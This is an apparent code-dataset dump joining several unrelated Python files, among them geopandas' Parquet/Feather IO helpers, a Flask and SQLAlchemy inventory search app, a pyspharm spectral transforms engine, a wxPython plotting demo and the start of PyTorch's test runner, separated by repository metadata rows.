return json.loads(metadata_str.decode("utf-8"))
def _validate_dataframe(df):
"""Validate that the GeoDataFrame conforms to requirements for writing
to Parquet format.
Raises `ValueError` if the GeoDataFrame is not valid.
copied from `pandas.io.parquet`
Parameters
----------
df : GeoDataFrame
"""
if not isinstance(df, DataFrame):
raise ValueError("Writing to Parquet/Feather only supports IO with DataFrames")
# must have value column names (strings only)
if df.columns.inferred_type not in {"string", "unicode", "empty"}:
raise ValueError("Writing to Parquet/Feather requires string column names")
# index level names must be strings
valid_names = all(
isinstance(name, str) for name in df.index.names if name is not None
)
if not valid_names:
raise ValueError("Index level names must be strings")
def _validate_metadata(metadata):
"""Validate geo metadata.
Must not be empty, and must contain the structure specified above.
Raises ValueError if metadata is not valid.
Parameters
----------
metadata : dict
"""
if not metadata:
raise ValueError("Missing or malformed geo metadata in Parquet/Feather file")
required_keys = ("primary_column", "columns")
for key in required_keys:
if metadata.get(key, None) is None:
raise ValueError(
"'geo' metadata in Parquet/Feather file is missing required key: "
"'{key}'".format(key=key)
)
if not isinstance(metadata["columns"], dict):
raise ValueError("'columns' in 'geo' metadata must be a dict")
# Validate that geometry columns have required metadata and values
required_col_keys = ("crs", "encoding")
for col, column_metadata in metadata["columns"].items():
for key in required_col_keys:
if key not in column_metadata:
raise ValueError(
"'geo' metadata in Parquet/Feather file is missing required key "
"'{key}' for column '{col}'".format(key=key, col=col)
)
if column_metadata["encoding"] != "WKB":
raise ValueError("Only WKB geometry encoding is supported")
def _geopandas_to_arrow(df, index=None):
"""
Helper function with main, shared logic for to_parquet/to_feather.
"""
from pyarrow import Table
_validate_dataframe(df)
# create geo metadata before altering incoming data frame
geo_metadata = _create_metadata(df)
df = df.to_wkb()
table = Table.from_pandas(df, preserve_index=index)
# Store geopandas specific file-level metadata
# This must be done AFTER creating the table or it is not persisted
metadata = table.schema.metadata
metadata.update({b"geo": _encode_metadata(geo_metadata)})
return table.replace_schema_metadata(metadata)
def _to_parquet(df, path, index=None, compression="snappy", **kwargs):
"""
Write a GeoDataFrame to the Parquet format.
Any geometry columns present are serialized to WKB format in the file.
Requires 'pyarrow'.
This is an initial implementation of Parquet file support and
associated metadata. This is tracking version 0.1.0 of the metadata
specification at:
https://github.com/geopandas/geo-arrow-spec
.. versionadded:: 0.8
Parameters
----------
path : str, path object
index : bool, default None
If ``True``, always include the dataframe's index(es) as columns
in the file output.
If ``False``, the index(es) will not be written to the file.
If ``None``, the index(ex) will be included as columns in the file
output except `RangeIndex` which is stored as metadata only.
compression : {'snappy', 'gzip', 'brotli', None}, default 'snappy'
Name of the compression to use. Use ``None`` for no compression.
kwargs
Additional keyword arguments passed to pyarrow.parquet.write_table().
"""
parquet = import_optional_dependency(
"pyarrow.parquet", extra="pyarrow is required for Parquet support."
)
path = _expand_user(path)
table = _geopandas_to_arrow(df, index=index)
parquet.write_table(table, path, compression=compression, **kwargs)
def _to_feather(df, path, index=None, compression=None, **kwargs):
"""
Write a GeoDataFrame to the Feather format.
Any geometry columns present are serialized to WKB format in the file.
Requires 'pyarrow' >= 0.17.
This is an initial implementation of Feather file support and
associated metadata. This is tracking version 0.1.0 of the metadata
specification at:
https://github.com/geopandas/geo-arrow-spec
.. versionadded:: 0.8
Parameters
----------
path : str, path object
index : bool, default None
If ``True``, always include the dataframe's index(es) as columns
in the file output.
If ``False``, the index(es) will not be written to the file.
If ``None``, the index(ex) will be included as columns in the file
output except `RangeIndex` which is stored as metadata only.
compression : {'zstd', 'lz4', 'uncompressed'}, optional
Name of the compression to use. Use ``"uncompressed"`` for no
compression. By default uses LZ4 if available, otherwise uncompressed.
kwargs
Additional keyword arguments passed to pyarrow.feather.write_feather().
"""
feather = import_optional_dependency(
"pyarrow.feather", extra="pyarrow is required for Feather support."
)
# TODO move this into `import_optional_dependency`
import pyarrow
if Version(pyarrow.__version__) < Version("0.17.0"):
raise ImportError("pyarrow >= 0.17 required for Feather support")
path = _expand_user(path)
table = _geopandas_to_arrow(df, index=index)
feather.write_feather(table, path, compression=compression, **kwargs)
def _arrow_to_geopandas(table):
"""
Helper function with main, shared logic for read_parquet/read_feather.
"""
df = table.to_pandas()
metadata = table.schema.metadata
if metadata is None or b"geo" not in metadata:
raise ValueError(
"""Missing geo metadata in Parquet/Feather file.
Use pandas.read_parquet/read_feather() instead."""
)
try:
metadata = _decode_metadata(metadata.get(b"geo", b""))
except (TypeError, json.decoder.JSONDecodeError):
raise ValueError("Missing or malformed geo metadata in Parquet/Feather file")
_validate_metadata(metadata)
# Find all geometry columns that were read from the file. May
# be a subset if 'columns' parameter is used.
geometry_columns = df.columns.intersection(metadata["columns"])
if not len(geometry_columns):
raise ValueError(
"""No geometry columns are included in the columns read from
the Parquet/Feather file. To read this file without geometry columns,
use pandas.read_parquet/read_feather() instead."""
)
geometry = metadata["primary_column"]
# Missing geometry likely indicates a subset of columns was read;
# promote the first available geometry to the primary geometry.
if len(geometry_columns) and geometry not in geometry_columns:
geometry = geometry_columns[0]
# if there are multiple non-primary geometry columns, raise a warning
if len(geometry_columns) > 1:
warnings.warn(
"Multiple non-primary geometry columns read from Parquet/Feather "
"file. The first column read was promoted to the primary geometry."
)
# Convert the WKB columns that are present back to geometry.
for col in geometry_columns:
df[col] = from_wkb(df[col].values, crs=metadata["columns"][col]["crs"])
return GeoDataFrame(df, geometry=geometry)
def _get_filesystem_path(path, filesystem=None, storage_options=None):
"""
Get the filesystem and path for a given filesystem and path.
If the filesystem is not None then it's just returned as is.
"""
import pyarrow
if (
isinstance(path, str)
and storage_options is None
and filesystem is None
and Version(pyarrow.__version__) >= Version("5.0.0")
):
# Use the native pyarrow filesystem if possible.
try:
from pyarrow.fs import FileSystem
filesystem, path = FileSystem.from_uri(path)
except Exception:
# fallback to use get_handle / fsspec for filesystems
# that pyarrow doesn't support
pass
if _is_fsspec_url(path) and filesystem is None:
fsspec = import_optional_dependency(
"fsspec", extra="fsspec is requred for 'storage_options'."
)
filesystem, path = fsspec.core.url_to_fs(path, **(storage_options or {}))
if filesystem is None and storage_options:
raise ValueError(
"Cannot provide 'storage_options' with non-fsspec path '{}'".format(path)
)
return filesystem, path
def _read_parquet(path, columns=None, storage_options=None, **kwargs):
"""
Load a Parquet object from the file path, returning a GeoDataFrame.
You can read a subset of columns in the file using the ``columns`` parameter.
However, the structure of the returned GeoDataFrame will depend on which
columns you read:
* if no geometry columns are read, this will raise a ``ValueError`` - you
should use the pandas `read_parquet` method instead.
* if the primary geometry column saved to this file is not included in
columns, the first available geometry column will be set as the geometry
column of the returned GeoDataFrame.
Requires 'pyarrow'.
.. versionadded:: 0.8
Parameters
----------
path : str, path object
columns : list-like of strings, default=None
If not None, only these columns will be read from the file. If
the primary geometry column is not included, the first secondary
geometry read from the file will be set as the geometry column
of the returned GeoDataFrame. If no geometry columns are present,
a ``ValueError`` will be raised.
storage_options : dict, optional
Extra options that make sense for a particular storage connection, e.g. host,
port, username, password, etc. For HTTP(S) URLs the key-value pairs are
forwarded to urllib as header options. For other URLs (e.g. starting with
"s3://", and "gcs://") the key-value pairs are forwarded to fsspec. Please
see fsspec and urllib for more details.
When no storage options are provided and a filesystem is implemented by
both ``pyarrow.fs`` and ``fsspec`` (e.g. "s3://") then the ``pyarrow.fs``
filesystem is preferred. Provide the instantiated fsspec filesystem using
the ``filesystem`` keyword if you wish to use its implementation.
**kwargs
Any additional kwargs passed to pyarrow.parquet.read_table().
Returns
-------
GeoDataFrame
Examples
--------
>>> df = geopandas.read_parquet("data.parquet") # doctest: +SKIP
Specifying columns to read:
>>> df = geopandas.read_parquet(
... "data.parquet",
... columns=["geometry", "pop_est"]
... ) # doctest: +SKIP
"""
parquet = import_optional_dependency(
"pyarrow.parquet", extra="pyarrow is required for Parquet support."
)
# TODO(https://github.com/pandas-dev/pandas/pull/41194): see if pandas
# adds filesystem as a keyword and match that.
filesystem = kwargs.pop("filesystem", None)
filesystem, path = _get_filesystem_path(
path, filesystem=filesystem, storage_options=storage_options
)
path = _expand_user(path)
kwargs["use_pandas_metadata"] = True
table = parquet.read_table(path, columns=columns, filesystem=filesystem, **kwargs)
return _arrow_to_geopandas(table)
def _read_feather(path, columns=None, **kwargs):
"""
Load a Feather object from the file path, returning a GeoDataFrame.
You can read a subset of columns in the file using the ``columns`` parameter.
However, the structure of the returned GeoDataFrame will depend on which
columns you read:
* if no geometry columns are read, this will raise a ``ValueError`` - you
should use the pandas `read_feather` method instead.
* if the primary geometry column saved to this file is not included in
columns, the first available geometry column will be set as the geometry
column of the returned GeoDataFrame.
Requires 'pyarrow' >= 0.17.
.. versionadded:: 0.8
Parameters
----------
path : str, path object
columns : list-like of strings, default=None
If not None, only these columns will be read from the file. If
the primary geometry column is not included, the first secondary
geometry read from the file will be set as the geometry column
of the returned GeoDataFrame. If no geometry columns are present,
a ``ValueError`` will be raised.
**kwargs
Any additional kwargs passed to pyarrow.feather.read_table().
Returns
-------
GeoDataFrame
Examples
--------
>>> df = geopandas.read_feather("data.feather") # doctest: +SKIP
Specifying columns to read:
>>> df = geopandas.read_feather(
... "data.feather",
... columns=["geometry", "pop_est"]
... ) # doctest: +SKIP
"""
feather = import_optional_dependency(
"pyarrow.feather", extra="pyarrow is required for Feather support."
)
# TODO move this into `import_optional_dependency`
import pyarrow
if Version(pyarrow.__version__) < Version("0.17.0"):
raise ImportError("pyarrow >= 0.17 required for Feather support")
path = _expand_user(path)
table = feather.read_table(path, columns=columns, **kwargs)
return _arrow_to_geopandas(table)
| 32.616466 | 87 | 0.653759 |
c36bd5026b34f96bfd247fabcebb9a1d670945e5 | 1,076 | py | Python | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | LICENSE.py | thismachinekillszombies/game_machine | 63e578ebb3e0d220e02f05f5e3c579c7d1cb1ae2 | [
"MIT"
] | null | null | null | MIT License
Copyright (c) 2018 Richard Butterworth
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
| 48.909091 | 78 | 0.806691 |
9e9699a6f1d4dddffcaa0df37784cb549f57cab3 | 4,862 | py | Python | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | run.py | andrew-dorrycott/inventory_search | 55a02d324188acd7f370010cec6254ff30b72cb1 | [
"Apache-2.0"
] | null | null | null | # Standard imports
import json
import logging
import logging.config
# Third party imports
import flask
import sqlalchemy
import yaml
# Application imports
from models.products import Product
LOGGER = logging.getLogger(__name__)
def load_config():
"""
Loads the config from config.yaml
:returns: Dict of loaded config.yaml
:rtype: dict
"""
with open("config.yaml", "r") as _file:
return yaml.load(_file, Loader=yaml.FullLoader)
def load_db(config):
"""
Creates a SQLAlchemy session to be used by the controllers
:param config: Configuration information provided by :meth:load_config
:type config: dict
:returns: SQLAlchemy Session
:rtype: sqlalchemy.orm.session.Session
"""
engine = sqlalchemy.create_engine(
config["postgresql"]["sqlalchemy_uri"].format(**config["postgresql"])
)
Session = sqlalchemy.orm.sessionmaker(bind=engine)
return Session()
def create_app():
"""
Creates the base Flask application for running
:returns: Flask app object
:rtype: flask.Flask
"""
app = flask.Flask(__name__, instance_relative_config=True)
config = load_config()
logging.config.dictConfig(config["logging"])
LOGGER.debug("Logging config loaded")
app.config.from_mapping(config)
session = load_db(config)
# Controllers (will be moved later)
@app.route("/")
def default():
"""
Default controller if someone goes to the base host not knowing to go
to view
:returns: Text for the user
:rtype: str
"""
return "Psst, go to /view instead!"
@app.route("/view")
def view():
"""
Page users can use to search from
:returns: Rendered template
:rtype: str
"""
return flask.render_template("view.html")
@app.route("/search/<token>")
@app.route("/search/<field>/<token>")
def search(token, field=None):
"""
REST-like endpoint to do general searches or specified searches
:param token: Full or partial words, integers, floats, or dates
:type token: str
:param field: Specific column searching through
:type field: str
:returns: Json with results and amount or Json with error message
:rtype: json
"""
# Search DB with the provided field and token
query = session.query(Product)
filters = None
if field:
column = getattr(Product, field)
LOGGER.debug(1, column)
if isinstance(column.type, (sqlalchemy.Float, sqlalchemy.Integer)):
filters = sqlalchemy.and_(getattr(Product, field) == token)
else:
filters = sqlalchemy.and_(
getattr(Product, field).ilike("%{}%".format(token))
)
else:
for _, column in Product.__dict__.items():
if (
isinstance(
column, sqlalchemy.orm.attributes.InstrumentedAttribute
)
is False
):
continue # Not a column attribute
# This one is doing all ANDs
if isinstance(
column.type, (sqlalchemy.String, sqlalchemy.VARCHAR)
):
new_filter = sqlalchemy.or_(
column.ilike("%{}%".format(token))
)
if filters is None:
filters = new_filter
else:
filters = filters | new_filter
elif isinstance(
column.type, (sqlalchemy.Float, sqlalchemy.Integer)
):
if token.isdigit() is False:
continue # Data won't work for this column
new_filter = sqlalchemy.or_(column == token)
if filters is None:
filters = new_filter
else:
filters = filters | new_filter
try:
results = query.filter(filters).all()
return json.dumps(
{
"results": [item.to_dict() for item in results],
"count": len(results),
}
)
except sqlalchemy.exc.DataError:
session.rollback()
return json.dumps(
{"error": "Invalid input for column `{}`".format(field)}
)
except Exception as error:
session.rollback()
LOGGER.exception(error)
return json.dumps({"error": "Catastrophic error happened"})
return app
if __name__ == "__main__":
LOGGER.info("Application starting")
app = create_app()
app.run()
| 28.769231 | 79 | 0.548334 |
6c41327c644909888733e228df0c524bc2be1be2 | 242 | py | Python | tools/list_remove_duplicates.py | lucasayres/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | 71 | 2018-06-28T17:38:15.000Z | 2022-02-08T17:42:42.000Z | tools/list_remove_duplicates.py | DalavanCloud/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | null | null | null | tools/list_remove_duplicates.py | DalavanCloud/python-tools | 686b84986aae1b1714fa5645b1f2a3fd6ef8355d | [
"MIT"
] | 14 | 2018-07-08T03:29:29.000Z | 2022-03-22T21:04:39.000Z | # -*- coding: utf-8 -*-
def list_remove_duplicates(dup_list):
"""Remove duplicates from a list.
Args:
dup_list (list): List.
Returns:
list: Return a list of unique values.
"""
return list(set(dup_list))
| 18.615385 | 45 | 0.599174 |
376fe2c452eac359c1fab83544fd67398769c9d4 | 953 | py | Python | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 66 | 2019-10-24T07:36:37.000Z | 2022-03-29T08:46:33.000Z | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 2 | 2019-11-16T10:53:18.000Z | 2021-08-31T07:08:42.000Z | preprocess.py | DavidHeSkr/GCN-GAN-pytorch | f8adf82596733464cb63dddf978c244b25aebe46 | [
"MIT"
] | 24 | 2019-11-16T02:28:34.000Z | 2022-03-31T03:31:01.000Z | import yaml
import os
import numpy as np
from utils import get_snapshot
# load config
config = yaml.load(open('config.yml'))
# build path
base_path = os.path.join('./data/', config['dataset'])
raw_base_path = os.path.join(base_path, 'raw')
train_save_path = os.path.join(base_path, 'train.npy')
test_save_path = os.path.join(base_path, 'test.npy')
# load data
num = len(os.listdir(raw_base_path))
data = np.zeros(shape=(num, config['node_num'], config['node_num']), dtype=np.float32)
for i in range(num):
path = os.path.join(raw_base_path, 'edge_list_' + str(i) + '.txt')
data[i] = get_snapshot(path, config['node_num'], config['max_thres'])
total_num = num - config['window_size']
test_num = int(config['test_rate'] * total_num)
train_num = total_num - test_num
train_data = data[0: train_num + config['window_size']]
test_data = data[train_num: num]
# save data
np.save(train_save_path, train_data)
np.save(test_save_path, test_data) | 27.228571 | 86 | 0.721931 |
9742e94e5d93b43ec44377afbb605dbcfe64b559 | 5,849 | py | Python | vcfkit/call.py | AndersenLab/VCF-kit | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 86 | 2017-01-18T14:26:26.000Z | 2022-03-17T02:26:17.000Z | vcfkit/call.py | AndersenLab/vcf-toolbox | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 38 | 2016-10-30T18:52:30.000Z | 2022-03-12T15:15:35.000Z | vcfkit/call.py | AndersenLab/vcf-toolbox | a81a1a56790718c53a525c648995c98a416d3bfe | [
"MIT"
] | 22 | 2017-01-18T14:44:38.000Z | 2021-12-01T20:59:59.000Z | #!/usr/bin/env python
"""
usage:
vk call <seq> --ref=<reference> (--all-sites|--vcf-sites) <vcf>
options:
-h --help Show this screen.
--version Show version.
"""
import os
import sys
from collections import defaultdict
from signal import SIG_DFL, SIGPIPE, signal
from Bio import SeqIO
from Bio.Blast.Applications import NcbiblastxCommandline
from clint.textui import colored, indent, puts, puts_err
from docopt import docopt
from vcfkit.utils.blastn import blast, blast_variant
from vcfkit.utils.reference import resolve_reference_genome
from vcfkit.utils.vcf import *
from vcfkit import vk
signal(SIGPIPE, SIG_DFL)
def seq_type(filename):
"""
Resolves sequence filetype using extension.
"""
filename, ext = os.path.splitext(filename.lower())
if ext in [".fasta", ".fa"]:
extension = 'fasta'
elif ext in [".fastq",".fq"]:
extension = 'fastq'
elif ext in [".ab1", '.abi']:
extension = 'abi'
else:
raise Exception("Unknown sequence file type: " + filename)
with indent(4):
puts_err(colored.green("\nReading sequences as %s\n" % extension.upper()))
return extension
def resolve_sample_from_line(samples, line):
"""
Resolves sample names by splitting fasta line
on non-word characters.
"""
line = re.split("[ \t]", line)
matched_sample = [x for x in samples if x in line]
if len(matched_sample) == 1:
return matched_sample[0]
return ""
def format_gt(gt):
# Return homozygous calls as single bases.
gt = list(set(re.split("[|/]", gt)))
if len(gt) == 1:
return gt[0]
else:
return '/'.join(gt)
def format_args(args, add_missing_stdin = False):
if add_missing_stdin:
pass # Test for vcf
def main(debug=None):
args = docopt(__doc__,
version='VCF-Toolbox v0.1',
argv=debug,
options_first=False)
module_path = os.path.split(os.path.realpath(__file__))[0]
handle = open(args["<seq>"], "rb")
reference = resolve_reference_genome(args["--ref"])
if args["<vcf>"]:
concordance = True
v = vcf(args["<vcf>"])
samples = v.samples
if args["--vcf-sites"] and args["<vcf>"] is None:
with indent(4):
exit(puts_err(colored.red("\nMust specify <vcf> with --vcf-sites\n")))
# Setup reference for blast call
b = blast(reference)
# Set file type:
sequence_file_type = seq_type(args["<seq>"])
# Output header
print(("\t".join(blast_variant.output_order)))
for record in SeqIO.parse(handle, sequence_file_type):
# Resolve sample within fasta line
sample = resolve_sample_from_line(samples, handle.name)
if not sample:
sample = resolve_sample_from_line(samples, record.name)
blast_results = b.blast_call(record)
classification = ""
for n, variant in enumerate(blast_results):
output_line = False
if variant is None:
puts_err(colored.red("No Results for " + sample + " " + record.description))
continue
if args["<vcf>"]:
if n == 0:
vcf_variants = []
for vcf_variant in v(variant.region()):
if sample:
gt = format_gt(vcf_variant.gt_bases[v.samples.index(sample)])
vcf_variants.append([vcf_variant.CHROM,
vcf_variant.POS,
gt,
vcf_variant.REF,
vcf_variant.ALT])
vcf_variant_positions = [x[0:2] for x in vcf_variants]
chrom_pos = variant.chrom_pos_allele()[0:2]
vcf_variant_match = [x for x in vcf_variants if x[0:2] == chrom_pos]
if vcf_variant_match:
vcf_variant_match = vcf_variant_match[0]
variant.vcf_gt = vcf_variant_match[2]
variant.REF = vcf_variant_match[3]
variant.ALT = ','.join(vcf_variant_match[4])
variant.fetch_variant_type()
if variant.REF == variant.seq_gt and variant.seq_gt == variant.vcf_gt:
variant.classification = "TN"
elif variant.REF != variant.seq_gt and variant.seq_gt == variant.vcf_gt:
variant.classification = "TP"
elif variant.REF == variant.seq_gt and variant.seq_gt != variant.vcf_gt:
variant.classification = "FP"
elif variant.REF != variant.seq_gt and variant.seq_gt != variant.vcf_gt:
variant.classification = "FN"
else:
variant.REF = ""
variant.ALT = ""
variant.fetch_variant_type()
variant.classification = ""
if args["--vcf-sites"] and variant.classification != "":
output_line = True
elif args["--all-sites"] is True:
output_line = True
else:
if args["--all-sites"]:
output_line = True
elif variant.is_variant:
output_line = True
if output_line:
variant.sample = sample
if record.description:
variant.description = record.description
else:
variant.description = os.path.split(handle.name)[1]
print('\t'.join([str(variant)]))
if __name__ == '__main__':
main()
| 34.815476 | 92 | 0.542315 |
2282b12b3f0aefe044aa7c20c9c06f723033509e | 1,698 | py | Python | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 98 | 2015-02-05T18:22:04.000Z | 2022-03-29T12:06:48.000Z | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 268 | 2015-01-14T15:43:24.000Z | 2022-02-13T22:04:37.000Z | cpa/tests/test.py | DavidStirling/CellProfiler-Analyst | 7a0bfcb5cc7db067844595bdbb90f3132f9a8ea9 | [
"MIT"
] | 64 | 2015-06-30T22:26:03.000Z | 2022-03-11T01:06:13.000Z | import wx
from matplotlib.backends.backend_wxagg import FigureCanvasWxAgg, NavigationToolbar2WxAgg
from matplotlib.backends.backend_wx import _load_bitmap
import matplotlib as mpl
app = wx.App()
f = wx.Frame(None)
fig = mpl.figure.Figure()
p = FigureCanvasWxAgg(f, -1, fig)
toolbar = NavigationToolbar2WxAgg(p)
toolbar.Hide()
#toolbar constants
TBFLAGS = (wx.TB_HORIZONTAL|wx.TB_TEXT)
tsize = (24,24)
tb = f.CreateToolBar(TBFLAGS)
_NTB2_HOME = wx.NewId()
_NTB2_BACK = wx.NewId()
_NTB2_FORWARD = wx.NewId()
_NTB2_PAN = wx.NewId()
_NTB2_ZOOM = wx.NewId()
_NTB2_SAVE = wx.NewId()
_NTB2_SUBPLOT = wx.NewId()
tb.AddSimpleTool(_NTB2_HOME, _load_bitmap('home.png'), 'Home', 'Reset original view')
tb.AddSimpleTool(_NTB2_BACK, _load_bitmap('back.png'), 'Back', 'Back navigation view')
tb.AddSimpleTool(_NTB2_FORWARD, _load_bitmap('forward.png'), 'Forward', 'Forward navigation view')
tb.AddCheckTool(_NTB2_PAN, "", _load_bitmap('move.png'), shortHelp='Pan')
tb.AddCheckTool(_NTB2_ZOOM, "", _load_bitmap('zoom_to_rect.png'), shortHelp='Zoom')
tb.AddSeparator()
tb.AddSimpleTool(_NTB2_SUBPLOT, _load_bitmap('subplots.png'), 'Configure subplots', 'Configure subplot parameters')
tb.AddSimpleTool(_NTB2_SAVE, _load_bitmap('filesave.png'), 'Save', 'Save plot contents to file')
f.Bind(wx.EVT_TOOL, toolbar.home, id=_NTB2_HOME)
f.Bind(wx.EVT_TOOL, toolbar.forward, id=_NTB2_FORWARD)
f.Bind(wx.EVT_TOOL, toolbar.back, id=_NTB2_BACK)
f.Bind(wx.EVT_TOOL, toolbar.zoom, id=_NTB2_ZOOM)
f.Bind(wx.EVT_TOOL, toolbar.pan, id=_NTB2_PAN)
f.Bind(wx.EVT_TOOL, toolbar.configure_subplots, id=_NTB2_SUBPLOT)
f.Bind(wx.EVT_TOOL, toolbar.save_figure, id=_NTB2_SAVE)
tb.Realize()
f.Show()
f.Close()
app.MainLoop() | 33.96 | 115 | 0.765607 |
53183842dd44f3cb21817d7848fe772712524167 | 4,742 | py | Python | DLWP/barotropic/pyspharm_transforms.py | jweyn/DLWP | 3f32bfab98eacee2abe880d5bd214b6060627edd | [
"MIT"
] | 75 | 2019-05-02T15:31:49.000Z | 2022-03-29T07:00:49.000Z | DLWP/barotropic/pyspharm_transforms.py | flashlxy/DLWP | 0fddfa3ee927fa298648fc3eb469f5a7a93e51e9 | [
"MIT"
] | 1 | 2020-09-10T11:25:07.000Z | 2020-09-17T08:15:17.000Z | DLWP/barotropic/pyspharm_transforms.py | flashlxy/DLWP | 0fddfa3ee927fa298648fc3eb469f5a7a93e51e9 | [
"MIT"
] | 28 | 2019-05-03T06:02:07.000Z | 2022-01-28T20:57:18.000Z | """A spectral transforms engine using pyspharm."""
# (c) Copyright 2016 Andrew Dawson.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function) #noqa
import numpy as np
try:
from spharm import Spharmt, getspecindx, gaussian_lats_wts
except ImportError:
raise ImportError('pyspharm is required to use this transforms engine')
class TransformsEngine(object):
"""A spectral transforms engine based on pyspharm."""
def __init__(self, nlon, nlat, truncation, radius=6371200.):
"""
Initialize the spectral transforms engine.
Arguments:
* nlon: int
Number of longitudes in the transform grid.
* nlat: int
Number of latitudes in the transform grid.
* truncation: int
The spectral truncation (triangular). This is the maximum
number of spherical harmonic modes retained in the discrete
truncation. More modes means higher resolution.
"""
self.sh = Spharmt(nlon, nlat, gridtype='regular', rsphere=radius)
self.radius = radius
self.nlon = nlon
self.nlat = nlat
self.truncation = truncation
def vrtdiv_spec_from_uv_grid(self, u, v):
"""
Compute spectral vorticity and divergence from grid u and v.
"""
try:
vrt, div = self.sh.getvrtdivspec(u, v, ntrunc=self.truncation)
except ValueError:
msg = ('u and v must be 2d or 3d arrays with shape ({y}, {x}) '
'or ({y}, {x}, :)'.format(y=self.nlat, x=self.nlon))
raise ValueError(msg)
return vrt, div
def uv_grid_from_vrtdiv_spec(self, vrt, div):
"""
Compute grid u and v from spectral vorticity and divergence.
"""
try:
u, v = self.sh.getuv(vrt, div)
except ValueError:
nspec = (self.truncation + 1) * (self.truncation + 2) // 2
msg = ('vrt and div must be 1d or 2d arrays with shape '
'(n) or (n, :) where n <= {}'.format(nspec))
raise ValueError(msg)
return u, v
def spec_to_grid(self, scalar_spec):
"""
Transform a scalar field from spectral to grid space.
"""
try:
scalar_grid = self.sh.spectogrd(scalar_spec)
except ValueError:
nspec = (self.truncation + 1) * (self.truncation + 2) // 2
msg = ('scalar_spec must be a 1d or 2d array with shape '
'(n) or (n, :) where n <= {}'.format(nspec))
raise ValueError(msg)
return scalar_grid
def grid_to_spec(self, scalar_grid):
"""
Transform a scalar field from grid to spectral space.
"""
try:
scalar_spec = self.sh.grdtospec(scalar_grid,
ntrunc=self.truncation)
except ValueError:
msg = ('scalar_grid must be a 2d or 3d array with shape '
'({y}, {x}) or ({y}, {x}, :)'.format(y=self.nlat,
x=self.nlon))
raise ValueError(msg)
return scalar_spec
def grad_of_spec(self, scalar_spec):
"""
Return zonal and meridional gradients of a spectral field.
"""
try:
dsdx, dsdy = self.sh.getgrad(scalar_spec)
except ValueError:
nspec = (self.truncation + 1) * (self.truncation + 2) // 2
msg = ('scalar_spec must be a 1d or 2d array with shape '
'(n) or (n, :) where n <= {}'.format(nspec))
raise ValueError(msg)
return dsdx, dsdy
@property
def wavenumbers(self):
"""
Wavenumbers corresponding to the spectral fields.
"""
return getspecindx(self.truncation)
@property
def grid_latlon(self):
"""
Return the latitude and longitude coordinate vectors of the
model grid.
"""
lats, _ = gaussian_lats_wts(self.nlat)
lons = np.arange(0., 360., 360. / self.nlon)
return lats, lons
| 37.046875 | 75 | 0.58857 |
fab61397130183c213b0d01dc643c72b6361cbea | 41,770 | py | Python | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | null | null | null | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | 1 | 2021-04-12T19:49:08.000Z | 2021-04-12T19:49:08.000Z | test/run_test.py | deltabravozulu/pytorch | c6eef589971e45bbedacc7f65533d1b8f80a6895 | [
"Intel"
] | null | null | null | #!/usr/bin/env python
import argparse
import copy
from datetime import datetime
import json
import modulefinder
import os
import shutil
import signal
import subprocess
import sys
import tempfile
import torch
from torch.utils import cpp_extension
from torch.testing._internal.common_utils import TEST_WITH_ROCM, shell, set_cwd, FILE_SCHEMA
from torch.testing._internal.framework_utils import calculate_shards
import torch.distributed as dist
from typing import Dict, Optional, Tuple, List, Any
from typing_extensions import TypedDict
try:
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), ".."))
from tools.stats_utils.s3_stat_parser import (get_previous_reports_for_branch, Report, HAVE_BOTO3)
except ImportError:
print("Unable to import s3_stat_parser from tools. Running without S3 stats...")
HAVE_BOTO3 = False
TESTS = [
'test_import_time',
'test_public_bindings',
'test_type_hints',
'test_autograd',
'benchmark_utils/test_benchmark_utils',
